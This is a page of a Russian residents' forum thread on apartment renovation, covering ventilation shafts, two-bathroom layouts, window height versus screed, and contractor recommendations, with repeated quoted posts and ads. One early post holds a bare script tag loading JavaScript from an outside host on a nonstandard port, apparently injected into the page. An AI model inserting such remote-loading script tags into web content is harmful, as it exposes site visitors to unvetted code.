Ремонт в квартирах

  • Назад
  • Страница 43 из 45
  • 41
  • 42
  • 43
  • 44
  • 45
  • Вперед

Куда написать-то?

Тут рекламировать нельзя, а гостю не напишешь.

 

<script src="//pronovostroy.ru:8011/bar2524.js" type="text/javascript" ></script>

 

и мне про перепланировку скиньте инфу по фирме!! спасибоо!!

Добрый день всем 

 

сори за возможно  глупый я вообще первый раз с ремонтом сталкиваюсь

 

в квартире два вот таких вентиляционных короба из монолита похоже...

 места много занимают... не знаете, их можно уменьшить?

 

5ab8d8c7c2567_.jpg

Объявления

Добрый день всем 

 

сори за возможно  глупый я вообще первый раз с ремонтом сталкиваюсь

 

в квартире два вот таких вентиляционных короба из монолита похоже...

 места много занимают... не знаете, их можно уменьшить?

 

5ab8d8c7c2567_.jpg

Их нельзя трогать.

  • Kalifornia это нравится

Добрый день всем 

 

сори за возможно  глупый я вообще первый раз с ремонтом сталкиваюсь

 

в квартире два вот таких вентиляционных короба из монолита похоже...

 места много занимают... не знаете, их можно уменьшить?

 

5ab8d8c7c2567_.jpg

Ни в коем случае. И дырки делать - тоже.

Дом-оранжерея "Новые Академики" в ЮЗАОВ престижном районе академической Москвы. Квартиры с панорамным остеклением — старт продаж
ЖК KINETIK от застройщика UDSВыгода до 1 5ОО ООО руб. в феврале. Срок сдачи - апрель 2О24г.! 2 минуты до м.Верхние Лихоборы!

Соседи, порекомендуйте плиз хорошую фирму или бригаду, кто делал ремонт именно в Невском и чью работу можно посмортреть в живую.
​Проект по электрике и воде у кого лучше заказывать, чтобы быстро сделали? Буду благодарна за любую информацию, но только без рекламы, только от жителей!
​Всех, кто закончил ремонт поздравляю с началом новой жизни в новой квартире! Всем счастья ))) !!!

Соседи, порекомендуйте плиз хорошую фирму или бригаду, кто делал ремонт именно в Невском и чью работу можно посмортреть в живую.
​Проект по электрике и воде у кого лучше заказывать, чтобы быстро сделали? Буду благодарна за любую информацию, но только без рекламы, только от жителей!
​Всех, кто закончил ремонт поздравляю с началом новой жизни в новой квартире! Всем счастья ))) !!!

Очень актуально. Присоединяюсь к просьбе.

Обратите внимание

Соседи, порекомендуйте плиз хорошую фирму или бригаду, кто делал ремонт именно в Невском и чью работу можно посмортреть в живую.
​Проект по электрике и воде у кого лучше заказывать, чтобы быстро сделали? Буду благодарна за любую информацию, но только без рекламы, только от жителей!
​Всех, кто закончил ремонт поздравляю с началом новой жизни в новой квартире! Всем счастья ))) !!!

Фирму советовать дело не благодарное, только если это не в рекламных целях (читай- получить откат от строителей).
Контакты, где делал проекты кинул в личку, хотя их и так все знают, кто близок к началу ремонта в Невском. Делают за пару дней.
За поздравления спасибо)

Добрый день, соседи! У меня закончился ремонт, могу поделится контактами строителей. Квалифицированная бригада из Белоруссии. Сделали под ключ, очень качественно. Ремонтом более чем довольна.


Добрый день. Дайте пжт контакты. Мой номер 9164682042. Спс

Добрый день! Не нашла нигде информацию - у УК есть свои ремонтники?  И если кто заказывал - какой ценник и довольны ли Вы?

Сейчас не проблема найти хорошую бригаду, которая бы сделала вам ремонт. Цены у всех разные, но будьте готовы к тому, что придётся в ремонт вложить не одну тысячу долларов. 

Добрый день всем 
 
сори за возможно  глупый я вообще первый раз с ремонтом сталкиваюсь
 
в квартире два вот таких вентиляционных короба из монолита похоже...
 места много занимают... не знаете, их можно уменьшить?
 
5ab8d8c7c2567_.jpg


Уменьшать нельзя. Вообще с ними нельзя ничего делать. По сути это обездоливая собственность и инженерные системы жизнедеятельности дома. Ой -ой -ой как плохо вмешиваться в такие дела.

Уменьшать нельзя. Вообще с ними нельзя ничего делать. По сути это обездоливая собственность и инженерные системы жизнедеятельности дома. Ой -ой -ой как плохо вмешиваться в такие дела.

Тут разве что их можно просто зашить как-то или сыграть при помощи дизайнерской мебели и тогда это будет иметь какой-то вид, а так, конечно, можно было сделать аккуратнее.

Подскажите, кто-нибудь делал два санузла в планировке 4Б? Можете поделиться вашим вариантом прихожей-санузлов? Нам очень надо не раздельный, а именно два санузла. И чтобы при этом в прихожей был шкаф для верхней одежды. И где-то стиралка с сушилкой.

 

5bd0354a55881_d561daa56f537efb36d0db023e81ed772.jpg

 

И насколько реально согласовать санузел от кухонного стояка, если сам санузел будет располагаться в прихожей и выход иметь в прихожую? Типа такого:

 

5bd03595b288c___21.png

Соседи, добрый день! 

Возник вопрос— был в квартире, панорамные окна установлены на высоте  9 см от чернового пола и не только в моей квартире. Прораб, который будет делать ремонт, говорит, что окна надо поднимать на 13 см (тк  стяжка будет 11 см)от чернового пола, что заливать раму это колхоз и неверно по технологии. Так установлено у всех. Кто что думает на этот счет?

Подскажите, кто-нибудь делал два санузла в планировке 4Б? Можете поделиться вашим вариантом прихожей-санузлов? Нам очень надо не раздельный, а именно два санузла. И чтобы при этом в прихожей был шкаф для верхней одежды. И где-то стиралка с сушилкой.

 

5bd0354a55881_d561daa56f537efb36d0db023e81ed772.jpg

 

И насколько реально согласовать санузел от кухонного стояка, если сам санузел будет располагаться в прихожей и выход иметь в прихожую? Типа такого:

 

5bd03595b288c___21.png

Боюсь, в вашем случае туалет просто физически расположить негде. В жилых зонах и кухнях - нельзя. в коридоре он не поместится. Разве только ванну разделить. А смысл? 

Соседи, добрый день! 

Возник вопрос— был в квартире, панорамные окна установлены на высоте  9 см от чернового пола и не только в моей квартире. Прораб, который будет делать ремонт, говорит, что окна надо поднимать на 13 см (тк  стяжка будет 11 см)от чернового пола, что заливать раму это колхоз и неверно по технологии. Так установлено у всех. Кто что думает на этот счет?

У нас панорамные окна, ничего не поднимали.  и раму не заливали... 11 см стяжка, а не слишком ли?

Подскажите, кто-нибудь делал два санузла в планировке 4Б? Можете поделиться вашим вариантом прихожей-санузлов? Нам очень надо не раздельный, а именно два санузла. И чтобы при этом в прихожей был шкаф для верхней одежды. И где-то стиралка с сушилкой.

 

5bd0354a55881_d561daa56f537efb36d0db023e81ed772.jpg

 

И насколько реально согласовать санузел от кухонного стояка, если сам санузел будет располагаться в прихожей и выход иметь в прихожую? Типа такого:

 

5bd03595b288c___21.png

Сложно, мы вертели эту планировку, с 2 с/у реально там не протолкнуться. В Вашем предложении надо на место помещения 4 делать унитаз (так как это прихожая. там можно), как то прокладывать трубу (с насосом?). В на 8 помещении ставить стиралку с сушилкой колонной ина место кухни заходить шкафом.

У нас панорамные окна, ничего не поднимали.  и раму не заливали... 11 см стяжка, а не слишком ли?

Так это всем придётся тогда окна поднимать? А нельзя сделать, например, не 13 см, а подогнать под окна и как раз будут утоплены в пол. Так даже лучше будет смотреться. 

Так это всем придётся тогда окна поднимать? А нельзя сделать, например, не 13 см, а подогнать под окна и как раз будут утоплены в пол. Так даже лучше будет смотреться. 

 

промерил еще раз одно окно 7 см от чернового пола— стяжка из-за перепада по углам квартиры меньше 11 см не получается. Плюс окна деревянные ( по крайней мере отделка) и убирать это в стяжку не самое хорошее решение.

промерил еще раз одно окно 7 см от чернового пола— стяжка из-за перепада по углам квартиры меньше 11 см не получается. Плюс окна деревянные ( по крайней мере отделка) и убирать это в стяжку не самое хорошее решение.

Чей тогда косяк, если не учли, что максимальная толщина стяжки может быть и больше 13 сантиметров. А чего такая большая толщина выходит? Пол получился неровный? 

  • Назад
  • Страница 43 из 45
  • 41
  • 42
  • 43
  • 44
  • 45
  • Вперед
Подписаться на форум в TelegramПодписаться на Telegram-бота
Ответить на тему
Представьтесь или авторизируйтесь,
чтобы получать уведомления об ответах и загружать файлы.

Прикрепить файлы

   Вы превысили квоту дискового пространства для вложенных файлов